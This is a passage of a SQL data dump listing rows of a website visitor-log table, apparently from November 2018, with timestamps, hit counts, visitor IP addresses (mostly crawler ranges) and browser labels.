'207.46.13.243','other'),(339218,1542962170,1,1,0,0,'8.29.198.27','other'),(339219,1542962352,1,1,0,0,'40.77.167.175','other'),(339220,1542962386,1,1,0,0,'40.77.167.85','other'),(339221,1542962396,1,1,0,0,'178.154.244.29','other'),(339222,1542962413,1,1,0,0,'46.229.168.144','other'),(339223,1542962415,1,1,0,0,'46.229.168.151','other'),(339224,1542962431,1,1,0,0,'54.36.149.104','other'),(339225,1542962530,1,1,0,0,'54.36.149.53','other'),(339226,1542962575,1,1,0,0,'54.36.148.77','other'),(339227,1542962742,1,1,0,0,'54.36.148.191','other'),(339228,1542962869,1,1,0,0,'54.36.148.205','other'),(339229,1542962997,1,1,0,0,'8.29.198.25','other'),(339230,1542963053,1,1,0,0,'54.36.148.29','other'),(339231,1542963219,1,1,0,0,'54.36.149.8','other'),(339232,1542963330,1,1,0,0,'54.36.148.75','other'),(339233,1542963347,1,1,0,0,'95.163.255.191','other'),(339234,1542963349,1,1,0,0,'95.163.255.174','other'),(339235,1542963352,1,1,0,0,'54.36.149.28','other'),(339236,1542963364,1,1,0,0,'40.77.167.85','other'),(339237,1542963520,1,1,0,0,'54.36.148.161','other'),(339238,1542963782,1,1,0,0,'54.36.149.56','other'),(339239,1542963855,1,1,0,0,'66.249.66.152','chrome'),(339240,1542963950,1,1,0,0,'54.36.148.251','other'),(339241,1542963973,1,1,0,0,'54.36.148.151','other'),(339242,1542964023,1,1,0,0,'178.95.246.220','chrome'),(339243,1542964223,2,2,0,0,'91.196.178.84','firefox'),(339244,1542964475,1,1,0,0,'40.77.167.162','other'),(339245,1542964504,1,1,0,0,'66.249.66.61','chrome'),(339246,1542964505,1,1,0,0,'66.249.66.44','chrome'),(339247,1542964569,1,1,0,0,'54.36.148.92','other'),(339248,1542964621,1,1,0,0,'54.36.148.215','other'),(339249,1542964648,1,1,0,0,'54.36.149.10','other'),(339250,1542964832,1,1,0,0,'54.36.149.26','other'),(339251,1542964884,1,1,0,0,'95.163.255.162','other'),(339252,1542964887,1,1,0,0,'95.163.255.176','other'),(339253,1542965142,3,3,0,0,'91.196.178.81','chrome'),(339254,1542965314,1,1,0,0,'54.36.149.63','other'),(339255,1542965340,1,1,0,0,'40.77.167.85','other'),(339256,1542965442,1,1,0,0,'54.36.148.233','other'),(339257,1542965632,1,1,0,0,'54.36.148.205','other'),(339258,1542965707,1,1,0,0,'54.36.149.10','other'),(339259,1542965795,1,1,0,0,'54.36.148.247','other'),(339260,1542965900,1,1,0,0,'54.36.148.116','other'),(339261,1542965923,3,3,0,0,'195.10.210.49','chrome'),(339262,1542966133,1,1,0,0,'40.77.167.175','other'),(339263,1542966160,1,1,0,0,'54.36.149.13','other'),(339264,1542966439,1,1,0,0,'54.36.148.141','other'),(339265,1542966515,1,1,0,0,'66.249.66.57','chrome'),(339266,1542966516,1,1,0,0,'66.249.66.44','chrome'),(339267,1542966520,2,2,0,0,'178.154.244.29','other'),(339268,1542966693,1,1,0,0,'95.163.255.99','other'),(339269,1542966696,1,1,0,0,'95.163.255.97','other'),(339270,1542966703,2,2,0,0,'91.196.177.46','firefox'),(339271,1542966845,1,1,0,0,'54.36.148.160','other'),(339272,1542966888,6,6,0,0,'91.196.178.84','chrome'),(339273,1542966910,1,1,0,0,'54.36.149.78','other'),(339274,1542966928,1,1,0,0,'54.36.148.189','other'),(339275,1542966977,1,1,0,0,'54.36.149.44','other'),(339276,1542967001,1,1,0,0,'54.36.149.37','other'),(339277,1542967330,1,1,0,0,'54.36.148.139','other'),(339278,1542967603,1,1,0,0,'54.36.148.180','other'),(339279,1542967697,1,1,0,0,'54.36.149.54','other'),(339280,1542967784,1,1,0,0,'54.36.148.236','other'),(339281,1542967791,2,2,0,0,'178.154.244.11','other'),(339282,1542967805,1,1,0,0,'66.249.66.152','chrome'),(339283,1542967864,2,2,0,0,'66.249.66.154','chrome'),(339284,1542967929,1,1,0,0,'54.36.148.22','other'),(339285,1542968031,1,1,0,0,'91.196.178.84','chrome'),(339286,1542968279,1,1,0,0,'54.36.148.199','other'),(339287,1542968460,1,1,0,0,'54.36.148.188','other'),(339288,1542968485,1,1,0,0,'54.36.149.104','other'),(339289,1542968628,1,1,0,0,'46.229.168.153','other'),(339290,1542968630,1,1,0,0,'46.229.168.132','other'),(339291,1542968700,1,1,0,0,'54.36.148.213','other'),(339292,1542968703,1,1,0,0,'37.9.113.148','other'),(339293,1542968746,2,2,0,0,'178.154.244.29','other'),(339294,1542968805,1,1,0,0,'54.36.148.74','other'),(339295,1542968907,1,1,0,0,'157.55.39.252','other'),(339296,1542969060,1,1,0,0,'95.135.8.53','chrome'),(339297,1542969422,1,1,0,0,'54.36.148.89','other'),(339298,1542969431,1,1,0,0,'54.36.148.227','other'),(339299,1542969586,1,1,0,0,'5.45.207.79','other'),(339300,1542969785,1,1,0,0,'54.36.148.221','other'),(339301,1542969787,1,1,0,0,'178.154.244.11','other'),(339302,1542969797,1,1,0,0,'46.229.168.150','other'),(339303,1542969826,1,1,0,0,'54.36.149.29','other'),(339304,1542969907,1,1,0,0,'40.77.167.175','other'),(339305,1542970225,2,2,0,0,'178.154.244.29','other'),(339306,1542970279,1,1,0,0,'66.249.66.157','chrome'),(339307,1542970280,1,1,0,0,'66.249.66.152','chrome'),(339308,1542970330,1,1,0,0,'54.36.148.176','other'),(339309,1542970360,1,1,0,0,'95.163.255.153','other'),(339310,1542970362,1,1,0,0,'95.163.255.173','other'),(339311,1542970844,1,1,0,0,'54.36.149.1','other'),(339312,1542970924,1,1,0,0,'66.249.66.154','chrome'),(339313,1542970962,1,1,0,0,'54.36.149.27','other'),(339314,1542971112,1,1,0,0,'54.36.148.56','other'),(339315,1542971120,1,1,0,0,'54.36.148.90','other'),(339316,1542971123,1,1,0,0,'54.36.148.241','other'),(339317,1542971296,1,1,0,0,'54.36.149.13','other'),(339318,1542971502,1,1,0,0,'8.29.198.26','other'),(339319,1542971590,1,1,0,0,'54.36.148.125','other'),(339320,1542971914,1,1,0,0,'5.45.207.19','other'),(339321,1542971924,1,1,0,0,'178.154.244.29','other'),(339322,1542972399,1,1,0,0,'66.249.66.40','chrome'),(339323,1542972593,1,1,0,0,'54.36.148.188','other'),(339324,1542972649,1,1,0,0,'54.36.149.92','other'),(339325,1542972658,1,1,0,0,'46.229.168.135','other'),(339326,1542972714,1,1,0,0,'54.36.148.219','other'),(339327,1542972738,1,1,0,0,'54.36.148.136','other'),(339328,1542972873,1,1,0,0,'54.36.149.27','other'),(339329,1542972890,1,1,0,0,'54.36.148.180','other'),(339330,1542972991,1,1,0,0,'54.36.148.24','other'),(339331,1542972993,1,1,0,0,'54.36.149.0','other'),(339332,1542973001,2,2,0,0,'8.29.198.26','other'),(339333,1542973022,1,1,0,0,'66.249.66.156','chrome'),(339334,1542973043,1,1,0,0,'54.36.148.178','other'),(339335,1542973215,1,1,0,0,'91.196.178.169','chrome'),(339336,1542973277,1,1,0,0,'37.9.113.103','other'),(339337,1542973287,1,1,0,0,'54.36.148.153','other'),(339338,1542973312,1,1,0,0,'66.249.66.40','chrome'),(339339,1542973337,1,1,0,0,'54.36.148.165','other'),(339340,1542973438,1,1,0,0,'54.36.149.26','other'),(339341,1542973806,1,1,0,0,'54.36.149.76','other'),(339342,1542973856,1,1,0,0,'46.229.168.133','other'),(339343,1542973941,1,1,0,0,'95.163.255.63','other'),(339344,1542973943,1,1,0,0,'95.163.255.68','other'),(339345,1542974003,1,1,0,0,'54.36.148.96','other'),(339346,1542974294,1,1,0,0,'40.77.167.175','other'),(339347,1542974317,1,1,0,0,'54.36.149.13','other'),(339348,1542974595,1,1,0,0,'54.36.149.23','other'),(339349,1542974764,1,1,0,0,'54.36.149.27','other'),(339350,1542974963,1,1,0,0,'54.36.148.117','other'),(339351,1542975091,2,2,0,0,'40.77.167.162','other'),(339352,1542975276,2,2,0,0,'130.180.216.46','chrome'),(339353,1542975449,1,1,0,0,'54.36.148.231','other'),(339354,1542975517,1,1,0,0,'178.154.244.29','other'),(339355,1542975641,1,1,0,0,'54.36.148.57','other'),(339356,1542975642,1,1,0,0,'95.163.255.155','other'),(339357,1542975645,1,1,0,0,'95.163.255.187','other'),(339358,1542975798,1,1,0,0,'54.36.148.78','other'),(339359,1542975961,1,1,0,0,'54.36.148.66','other'),(339360,1542976284,1,1,0,0,'66.249.66.152','chrome'),(339361,1542976428,2,2,0,0,'54.36.148.124','other'),(339362,1542976429,1,1,0,0,'66.249.66.157','chrome'),(339363,1542976491,1,1,0,0,'54.36.149.72','other'),(339364,1542976610,2,2,0,0,'95.163.255.97','other'),(339365,1542976632,1,1,0,0,'54.36.148.208','other'),(339366,1542976663,1,1,0,0,'54.36.148.69','other'),(339367,1542976683,1,1,0,0,'46.229.168.150','other'),(339368,1542976763,1,1,0,0,'54.36.148.162','other'),(339369,1542976847,1,1,0,0,'37.55.121.81','firefox'),(339370,1542976880,1,1,0,0,'54.36.148.239','other'),(339371,1542977162,1,1,0,0,'40.77.167.162','other'),(339372,1542977275,2,2,0,0,'91.196.178.81','chrome'),(339373,1542977383,1,1,0,0,'54.36.149.7','other'),(339374,1542977537,2,2,0,0,'95.163.255.109','other'),(339375,1542977544,1,1,0,0,'95.163.255.103','other'),(339376,1542977553,1,1,0,0,'95.163.255.108','other'),(339377,1542977561,1,1,0,0,'95.163.255.102','other'),(339378,1542977586,1,1,0,0,'95.163.255.104','other'),(339379,1542977705,1,1,0,0,'46.229.168.141','other'),(339380,1542977710,1,1,0,0,'54.36.148.237','other'),(339381,1542977826,2,2,0,0,'95.163.255.93','other'),(339382,1542978172,1,1,0,0,'54.36.148.157','other'),(339383,1542978311,1,1,0,0,'54.36.148.14','other'),(339384,1542978471,1,1,0,0,'54.36.148.67','other'),(339385,1542978505,1,1,0,0,'66.249.66.57','chrome'),(339386,1542978519,2,2,0,0,'66.249.66.42','chrome'),(339387,1542978585,2,2,0,0,'91.196.178.133','firefox'),(339388,1542978643,1,1,0,0,'54.36.148.165','other'),(339389,1542978721,1,1,0,0,'66.249.66.156','chrome'),(339390,1542978722,2,1,1,0,'66.249.66.152',''),(339391,1542978772,1,1,0,0,'54.36.148.35','other'),(339392,1542978920,1,0,1,0,'66.249.66.155',''),(339393,1542979095,1,1,0,0,'54.36.149.41','other'),(339394,1542979250,1,1,0,0,'91.196.178.169','chrome'),(339395,1542979349,1,1,0,0,'54.36.148.37','other'),(339396,1542979494,1,1,0,0,'54.36.148.174','other'),(339397,1542979712,1,1,0,0,'66.249.66.155','chrome'),(339398,1542979713,1,1,0,0,'66.249.66.154','chrome'),(339399,1542979866,1,1,0,0,'54.36.148.101','other'),(339400,1542979882,1,1,0,0,'54.36.148.54','other'),(339401,1542979960,1,1,0,0,'54.36.148.97','other'),(339402,1542980051,1,1,0,0,'54.36.149.11','other'),(339403,1542980148,1,1,0,0,'54.36.148.253','other'),(339404,1542980225,1,1,0,0,'54.36.149.93','other'),(339405,1542980400,1,1,0,0,'54.36.149.40','other'),(339406,1542980466,1,1,0,0,'54.36.149.95','other'),(339407,1542980573,1,1,0,0,'54.36.149.12','other'),(339408,1542980920,1,1,0,0,'54.36.148.108','other'),(339409,1542981351,1,1,0,0,'54.36.149.21','other'),(339410,1542981366,1,1,0,0,'54.36.148.106','other'),(339411,1542981374,1,1,0,0,'95.163.255.154','other'),(339412,1542981413,1,1,0,0,'54.36.149.28','other'),(339413,1542981627,3,3,0,0,'178.154.244.29','other'),(339414,1542981730,1,1,0,0,'54.36.148.149','other'),(339415,1542981764,1,1,0,0,'37.9.113.20','other'),(339416,1542981775,1,1,0,0,'178.154.200.48','other'),(339417,1542981776,2,2,0,0,'91.196.177.46','firefox'),(339418,1542981791,1,1,0,0,'54.36.148.48','other'),(339419,1542981826,2,2,0,0,'5.45.207.19','other'),(339420,1542981976,4,4,0,0,'178.154.244.11','other'),(339421,1542981979,1,1,0,0,'95.108.213.4','other'),(339422,1542981984,1,1,0,0,'54.36.149.8','other'),(339423,1542982167,1,1,0,0,'54.36.148.112','other'),(339424,1542982223,1,1,0,0,'141.8.142.103','other'),(339425,1542982262,1,1,0,0,'54.36.149.99','other'),(339426,1542982321,1,1,0,0,'141.8.132.16','other'),(339427,1542982355,1,1,0,0,'8.29.198.25','other'),(339428,1542982636,1,1,0,0,'54.36.148.178','other'),(339429,1542982728,1,1,0,0,'178.154.244.29','other'),(339430,1542982927,1,1,0,0,'54.36.149.1','other'),(339431,1542983158,1,1,0,0,'66.249.65.105','chrome'),(339432,1542983159,2,2,0,0,'66.249.65.124','chrome'),(339433,1542983197,1,1,0,0,'54.36.148.80','other'),(339434,1542983219,1,1,0,0,'54.36.148.100','other'),(339435,1542983408,1,1,0,0,'54.36.149.50','other'),(339436,1542983423,1,1,0,0,'5.45.207.19','other'),(339437,1542983490,1,1,0,0,'54.36.148.67','other'),(339438,1542983522,1,1,0,0,'54.36.148.224','other'),(339439,1542983531,1,1,0,0,'46.229.168.133','other'),(339440,1542983667,1,1,0,0,'54.36.148.130','other'),(339441,1542983835,1,1,0,0,'8.29.198.26','other'),(339442,1542983998,1,1,0,0,'54.36.148.255','other'),(339443,1542984101,1,1,0,0,'66.249.65.105','chrome'),(339444,1542984103,1,1,0,0,'66.249.65.124','chrome'),(339445,1542984202,1,1,0,0,'54.36.148.185','other'),(339446,1542984251,1,1,0,0,'178.154.244.29','other'),(339447,1542984476,1,1,0,0,'46.229.168.144','other'),(339448,1542984654,1,1,0,0,'54.36.148.107','other'),(339449,1542984678,1,1,0,0,'8.29.198.25','other'),(339450,1542984710,1,1,0,0,'40.77.167.162','other'),(339451,1542984771,2,2,0,0,'54.36.148.160','other'),(339452,1542984916,1,1,0,0,'54.36.149.11','other'),(339453,1542985018,1,1,0,0,'54.36.148.115','other'),(339454,1542985316,1,1,0,0,'54.36.148.220','other'),(339455,1542985539,1,1,0,0,'46.229.168.153','other'),(339456,1542985656,1,1,0,0,'66.249.65.126','chrome'),(339457,1542985747,1,1,0,0,'66.249.65.105','chrome'),(339458,1542985761,1,1,0,0,'66.249.65.122','chrome'),(339459,1542985891,1,1,0,0,'46.229.168.151','other'),(339460,1542985911,1,1,0,0,'54.36.149.57','other'),(339461,1542986124,1,1,0,0,'54.36.148.61','other'),(339462,1542986369,1,1,0,0,'54.36.149.48','other'),(339463,1542986666,1,1,0,0,'54.36.148.220','other'),(339464,1542986795,1,1,0,0,'40.77.167.162','other'),(339465,1542986796,1,1,0,0,'95.163.255.158','other'),(339466,1542986799,1,1,0,0,'95.163.255.183','other'),(339467,1542987081,1,1,0,0,'213.156.89.211','chrome'),(339468,1542987094,1,1,0,0,'54.36.149.12','other'),(339469,1542987196,2,2,0,0,'54.36.148.47','other'),(339470,1542987313,1,1,0,0,'54.36.149.85','other'),(339471,1542987667,1,1,0,0,'54.36.148.160','other'),(339472,1542987775,1,1,0,0,'54.36.149.37','other'),(339473,1542987791,1,1,0,0,'54.36.148.76','other'),(339474,1542987814,1,1,0,0,'54.36.149.34','other'),(339475,1542987939,1,1,0,0,'54.36.148.185','other'),(339476,1542988159,1,1,0,0,'54.36.148.68','other'),(339477,1542988179,1,1,0,0,'54.36.148.156','other'),(339478,1542988501,1,1,0,0,'54.36.148.157','other'),(339479,1542988518,1,1,0,0,'54.36.148.50','other'),(339480,1542988834,1,1,0,0,'54.36.148.254','other'),(339481,1542989130,1,1,0,0,'54.36.149.105','other'),(339482,1542989447,1,1,0,0,'54.36.148.178','other'),(339483,1542989678,1,1,0,0,'54.36.149.71','other'),(339484,1542989679,2,2,0,0,'46.211.24.69','chrome'),(339485,1542989720,1,1,0,0,'54.36.148.220','other'),(339486,1542989918,1,1,0,0,'54.36.148.196','other'),(339487,1542990014,1,1,0,0,'54.36.148.193','other'),(339488,1542990019,1,1,0,0,'54.36.148.210','other'),(339489,1542990333,1,1,0,0,'40.77.167.175','other'),(339490,1542990383,1,1,0,0,'54.36.149.92','other'),(339491,1542990609,1,1,0,0,'54.36.148.66','other'),(339492,1542990759,1,1,0,0,'46.229.168.136','other'),(339493,1542990829,1,1,0,0,'54.36.148.76','other'),(339494,1542990864,1,1,0,0,'54.36.148.239','other'),(339495,1542990954,1,1,0,0,'54.36.148.231','other'),(339496,1542991053,1,1,0,0,'54.36.149.70','other'),(339497,1542991092,1,1,0,0,'46.229.168.141','other'),(339498,1542991094,1,1,0,0,'46.229.168.138','other'),(339499,1542991122,2,2,0,0,'91.196.178.136','firefox'),(339500,1542991232,1,1,0,0,'54.36.148.70','other'),(339501,1542991591,1,1,0,0,'66.249.65.126','chrome'),(339502,1542991685,1,1,0,0,'95.163.255.158','other'),(339503,1542991688,1,1,0,0,'95.163.255.193','other'),(339504,1542992112,1,1,0,0,'95.163.255.157','other'),(339505,1542992115,1,1,0,0,'95.163.255.160','other'),(339506,1542992143,2,2,0,0,'46.211.24.69','chrome'),(339507,1542992170,1,1,0,0,'54.36.148.118','other'),(339508,1542992218,1,1,0,0,'46.229.168.130','other'),(339509,1542992253,1,1,0,0,'178.154.244.11','other'),(339511,1542992254,3,3,0,0,'178.154.244.29','other'),(339513,1542992392,1,1,0,0,'54.36.148.85','other'),(339514,1542992475,1,1,0,0,'54.36.148.12','other'),(339515,1542992517,1,1,0,0,'54.36.148.108','other'),(339516,1542992623,2,2,0,0,'87.250.224.47','other'),(339517,1542992719,1,1,0,0,'54.36.148.159','other'),(339518,1542992756,1,1,0,0,'95.163.255.154','other'),(339519,1542992759,1,1,0,0,'95.163.255.168','other'),(339520,1542993086,1,1,0,0,'95.163.255.109','other'),(339521,1542993101,1,1,0,0,'95.163.255.108','other'),(339522,1542993190,1,1,0,0,'8.29.198.25','other'),(339523,1542993241,1,1,0,0,'95.163.255.96','other'),(339524,1542993245,1,1,0,0,'95.163.255.98','other'),(339525,1542993290,1,1,0,0,'46.229.168.138','other'),(339526,1542993345,1,1,0,0,'54.36.148.31','other'),(339527,1542993494,1,1,0,0,'54.36.148.53','other'),(339528,1542993676,1,1,0,0,'54.36.149.33','other'),(339529,1542994053,1,1,0,0,'54.36.149.73','other'),(339530,1542994137,1,1,0,0,'66.249.65.103','chrome'),(339531,1542994138,1,1,0,0,'66.249.65.124','chrome'),(339532,1542994168,1,1,0,0,'46.229.168.152','other'),(339533,1542994170,1,1,0,0,'46.229.168.129','other'),(339534,1542994174,1,1,0,0,'46.229.168.143','other'),(339535,1542994204,1,1,0,0,'54.36.148.247','other'),(339536,1542994221,1,1,0,0,'54.36.149.18','other'),(339537,1542994225,1,1,0,0,'54.36.148.10','other'),(339538,1542994314,1,1,0,0,'54.36.148.35','other'),(339539,1542994360,1,1,0,0,'54.36.149.23','other'),(339540,1542994545,1,1,0,0,'54.36.148.231','other'),(339541,1542994643,1,1,0,0,'46.229.168.134','other'),(339542,1542994687,2,2,0,0,'8.29.198.25','other'),(339543,1542994741,1,1,0,0,'54.36.148.82','other'),(339544,1542994961,1,1,0,0,'54.36.148.30','other'),(339545,1542995115,1,1,0,0,'54.36.148.195','other'),(339546,1542995260,1,1,0,0,'54.36.148.173','other'),(339547,1542995349,1,1,0,0,'54.36.149.67','other'),(339548,1542995378,1,1,0,0,'54.36.148.253','other'),(339549,1542995525,2,2,0,0,'178.154.244.29','other'),(339550,1542995546,1,1,0,0,'54.36.148.61','other'),(339551,1542995559,1,1,0,0,'54.36.148.153','other'),(339552,1542996049,1,1,0,0,'54.36.148.120','other'),(339553,1542996077,1,1,0,0,'54.36.149.51','other'),(339554,1542996190,1,1,0,0,'54.36.149.39','other'),(339555,1542996212,1,1,0,0,'40.77.167.162','other'),(339556,1542996336,1,1,0,0,'54.36.148.218','other'),(339557,1542996363,2,2,0,0,'54.36.149.6','other'),(339558,1542996780,1,1,0,0,'40.77.167.175','other'),(339559,1542996887,1,1,0,0,'66.249.65.122','chrome'),(339560,1542997118,1,1,0,0,'54.36.148.254','other'),(339561,1542997258,1,1,0,0,'54.36.149.95','other'),(339562,1542997510,1,1,0,0,'54.36.148.94','other'),(339563,1542998214,1,1,0,0,'40.77.167.85','other'),(339564,1542998330,1,1,0,0,'95.163.255.159','other'),(339565,1542998333,1,1,0,0,'95.163.255.175','other'),(339566,1542998576,1,1,0,0,'66.249.65.105','chrome'),(339568,1542998688,1,1,0,0,'54.36.148.87','other'),(339569,1542998724,1,1,0,0,'66.249.65.126','chrome'),(339570,1542998730,1,1,0,0,'54.36.148.44','other'),(339571,1542998738,1,1,0,0,'178.154.244.29','other'),(339572,1542998826,1,1,0,0,'66.249.65.106','chrome'),(339573,1542998829,1,1,0,0,'54.36.148.70','other'),(339574,1542998874,1,1,0,0,'157.55.39.252','other'),(339575,1542998891,1,1,0,0,'54.36.149.64','other'),(339576,1542998971,1,1,0,0,'40.77.167.175','other'),(339577,1542998976,1,1,0,0,'66.249.65.124','chrome'),(339578,1542999136,1,1,0,0,'54.36.148.179','other'),(339579,1542999208,1,1,0,0,'54.36.148.137','other'),(339580,1542999614,1,1,0,0,'54.36.148.119','other'),(339581,1542999681,1,1,0,0,'54.36.148.246','other'),(339582,1542999769,1,1,0,0,'54.36.149.14','other'),(339583,1542999972,1,1,0,0,'54.36.149.87','other'),(339584,1543000056,1,1,0,0,'54.36.149.76','other'),(339585,1543000127,1,1,0,0,'54.36.148.165','other'),(339586,1543000307,1,1,0,0,'54.36.149.107','other'),(339587,1543000329,1,1,0,0,'54.36.148.243','other'),(339588,1543000548,1,1,0,0,'54.36.148.229','other'),(339589,1543000675,1,1,0,0,'54.36.148.173','other'),(339590,1543000716,1,1,0,0,'54.36.149.56','other'),(339591,1543001576,2,2,0,0,'91.196.178.56','chrome'),(339592,1543001801,1,1,0,0,'54.36.148.246','other'),(339593,1543001812,2,2,0,0,'95.134.220.225','chrome'),(339594,1543001854,1,1,0,0,'54.36.148.112','other'),(339595,1543002091,1,1,0,0,'40.77.167.175','other'),(339596,1543002552,1,1,0,0,'54.36.149.36','other'),(339597,1543002679,1,1,0,0,'40.77.167.85','other'),(339598,1543002715,1,1,0,0,'54.36.149.24','other'),(339599,1543002916,1,1,0,0,'54.36.148.59','other'),(339600,1543003009,1,1,0,0,'54.36.149.38','other'),(339601,1543003044,1,1,0,0,'54.36.148.178','other'),(339602,1543003230,1,1,0,0,'54.36.148.84','other'),(339603,1543003351,1,1,0,0,'66.249.65.106','chrome'),(339604,1543003405,1,1,0,0,'54.36.148.218','other'),(339605,1543003712,1,1,0,0,'40.77.167.162','other'),(339606,1543003877,1,1,0,0,'40.77.167.175','other'),(339607,1543003990,1,1,0,0,'54.36.148.50','other'),(339608,1543003991,1,1,0,0,'54.36.148.42','other'),(339609,1543004025,1,1,0,0,'8.29.198.27','other'),(339610,1543004071,1,1,0,0,'54.36.149.25','other'),(339611,1543004095,1,1,0,0,'54.36.149.54','other'),(339612,1543004250,1,1,0,0,'31.148.135.64','firefox'),(339613,1543004298,1,1,0,0,'54.36.149.37','other'),(339614,1543004442,1,1,0,0,'54.36.148.246','other'),(339615,1543004659,1,1,0,0,'54.36.149.60','other'),(339616,1543004738,1,1,0,0,'46.229.168.140','other'),(339617,1543004807,1,1,0,0,'54.36.149.43','other'),(339618,1543005084,1,1,0,0,'54.36.148.158','other'),(339619,1543005332,1,1,0,0,'54.36.149.29','other'),(339620,1543005521,2,2,0,0,'8.29.198.27','other'),(339621,1543005619,1,1,0,0,'66.249.65.124','chrome'),(339622,1543005659,1,1,0,0,'66.249.65.121','chrome'),(339623,1543005682,1,1,0,0,'66.249.65.108','chrome'),(339624,1543005764,1,1,0,0,'87.250.224.47','other'),(339625,1543005767,5,5,0,0,'178.154.244.11','other'),(339626,1543005872,1,1,0,0,'54.36.149.44','other'),(339627,1543006011,1,1,0,0,'66.249.65.126','chrome'),(339628,1543006076,1,1,0,0,'54.36.148.255','other'),(339629,1543006081,1,1,0,0,'46.229.168.142','other'),(339630,1543006084,1,1,0,0,'46.229.168.133','other'),(339631,1543006370,1,1,0,0,'5.45.207.19','other'),(339632,1543006528,4,4,0,0,'178.154.244.29','other'),(339633,1543006546,2,2,0,0,'40.77.167.162','other'),(339634,1543006554,1,1,0,0,'54.36.148.192','other'),(339635,1543006691,4,4,0,0,'178.154.244.11','other'),(339636,1543006838,2,2,0,0,'66.249.65.122','chrome'),(339637,1543007002,1,1,0,0,'54.36.148.29','other'),(339638,1543007064,1,1,0,0,'37.9.113.20','other'),(339639,1543007082,1,1,0,0,'54.36.148.120','other'),(339640,1543007464,3,3,0,0,'178.154.244.29','other'),(339641,1543007551,1,1,0,0,'54.36.149.45','other'),(339642,1543007697,4,4,0,0,'178.154.244.11','other'),(339643,1543007742,1,1,0,0,'66.249.65.122','chrome'),(339644,1543007780,1,1,0,0,'5.45.207.79','other'),(339645,1543007789,1,1,0,0,'54.36.149.20','other'),(339646,1543007850,1,1,0,0,'141.8.142.103','other'),(339647,1543007874,1,1,0,0,'54.36.148.143','other'),(339648,1543007929,1,1,0,0,'54.36.149.93','other'),(339649,1543008247,1,1,0,0,'46.229.168.141','other'),(339650,1543008249,1,1,0,0,'46.229.168.137','other'),(339651,1543008437,1,1,0,0,'54.36.148.135','other'),(339652,1543008676,1,1,0,0,'54.36.149.90','other'),(339653,1543008677,1,1,0,0,'54.36.148.218','other'),(339654,1543008876,1,1,0,0,'54.36.149.88','other'),(339655,1543009031,1,1,0,0,'54.36.148.181','other'),(339656,1543009073,1,1,0,0,'46.229.168.129','other'),(339657,1543009350,1,1,0,0,'54.36.148.124','other'),(339658,1543009357,1,1,0,0,'54.36.148.237','other'),(339659,1543009783,1,1,0,0,'54.36.148.51','other'),(339660,1543009785,1,1,0,0,'54.36.148.98','other'),(339661,1543009899,1,1,0,0,'46.229.168.135','other'),(339662,1543010089,1,1,0,0,'54.36.148.56','other'),(339663,1543010172,1,1,0,0,'54.36.149.18','other'),(339664,1543010366,1,1,0,0,'46.211.151.2','chrome'),(339665,1543010389,1,1,0,0,'54.36.148.29','other'),(339667,1543010442,1,1,0,0,'54.36.148.93','other'),(339668,1543010619,1,1,0,0,'54.36.148.12','other'),(339669,1543010904,2,2,0,0,'157.55.39.252','other'),(339670,1543010928,1,1,0,0,'66.249.65.125','chrome'),(339671,1543010929,1,1,0,0,'66.249.65.106','chrome'),(339672,1543010938,1,1,0,0,'46.229.168.144','other'),(339673,1543010944,1,1,0,0,'54.36.148.66','other'),(339674,1543010946,1,1,0,0,'54.36.148.157','other'),(339675,1543011076,1,1,0,0,'54.36.148.238','other'),(339676,1543011455,1,1,0,0,'54.36.148.214','other'),(339677,1543011501,1,1,0,0,'54.36.148.170','other'),(339678,1543011661,1,1,0,0,'54.36.148.86','other'),(339679,1543011706,1,1,0,0,'54.36.149.53','other'),(339680,1543011714,1,1,0,0,'66.249.65.124','chrome'),(339681,1543011766,1,1,0,0,'54.36.148.246','other'),(339682,1543011808,1,1,0,0,'54.36.148.79','other'),(339683,1543012166,1,1,0,0,'54.36.149.44','other'),(339684,1543012264,5,5,0,0,'40.77.167.175','other'),(339685,1543012267,4,4,0,0,'40.77.167.162','other'),(339686,1543012273,4,4,0,0,'40.77.167.85','other'),(339687,1543012289,9,9,0,0,'157.55.39.252','other'),(339688,1543012328,1,1,0,0,'54.36.148.88','other'),(339689,1543012399,1,1,0,0,'54.36.148.184','other'),(339690,1543012416,1,1,0,0,'46.229.168.135','other'),(339691,1543012468,1,1,0,0,'66.249.65.126','chrome'),(339692,1543012603,1,1,0,0,'66.249.65.121','chrome'),(339694,1543012901,1,1,0,0,'54.36.149.69','other'),(339695,1543013001,1,1,0,0,'54.36.149.24','other'),(339696,1543013057,1,1,0,0,'54.36.148.43','other'),(339697,1543013118,1,1,0,0,'54.36.148.55','other'),(339698,1543013316,1,1,0,0,'54.36.148.67','other'),(339699,1543013521,1,1,0,0,'66.249.65.99','chrome'),(339700,1543013680,1,1,0,0,'54.36.148.125','other'),(339701,1543013825,1,1,0,0,'66.249.65.126','chrome'),(339702,1543013848,1,1,0,0,'66.249.65.124','chrome'),(339703,1543013852,1,1,0,0,'54.36.148.211','other'),(339704,1543013879,2,2,0,0,'54.36.149.74','other'),(339705,1543014019,1,1,0,0,'54.36.148.188','other'),(339706,1543014187,1,1,0,0,'54.36.148.158','other'),(339707,1543014385,1,1,0,0,'54.36.148.199','other'),(339708,1543014827,1,1,0,0,'95.163.255.169','other'),(339709,1543014860,1,1,0,0,'8.29.198.25','other'),(339710,1543015104,1,1,0,0,'54.36.148.193','other'),(339711,1543015247,1,1,0,0,'54.36.148.246','other'),(339712,1543015398,1,1,0,0,'46.229.168.138','other'),(339713,1543015400,1,1,0,0,'54.36.148.22','other'),(339714,1543015404,1,1,0,0,'54.36.149.25','other'),(339715,1543015666,1,1,0,0,'46.229.168.146','other'),(339716,1543015880,1,1,0,0,'54.36.149.78','other'),(339717,1543016151,1,1,0,0,'46.229.168.133','other'),(339718,1543016244,1,1,0,0,'54.36.148.203','other'),(339719,1543016341,1,1,0,0,'8.29.198.27','other'),(339720,1543016402,1,1,0,0,'54.36.148.162','other'),(339721,1543016464,1,1,0,0,'213.180.203.17','other'),(339722,1543016468,1,1,0,0,'87.250.224.47','other'),(339723,1543016469,1,1,0,0,'141.8.142.103','other'),(339725,1543016621,1,1,0,0,'54.36.149.102','other'),(339726,1543016762,1,1,0,0,'54.36.149.51','other'),(339727,1543016775,1,1,0,0,'54.36.148.128','other'),(339728,1543016814,1,1,0,0,'54.36.148.103','other'),(339729,1543016890,1,1,0,0,'54.36.148.28','other'),(339730,1543016954,1,1,0,0,'54.36.148.225','other'),(339731,1543017174,1,1,0,0,'8.29.198.25','other'),(339732,1543017220,1,1,0,0,'178.154.171.27','other'),(339733,1543017337,1,1,0,0,'54.36.148.31','other'),(339734,1543017446,1,1,0,0,'157.55.39.252','other'),(339735,1543017449,1,1,0,0,'66.249.65.9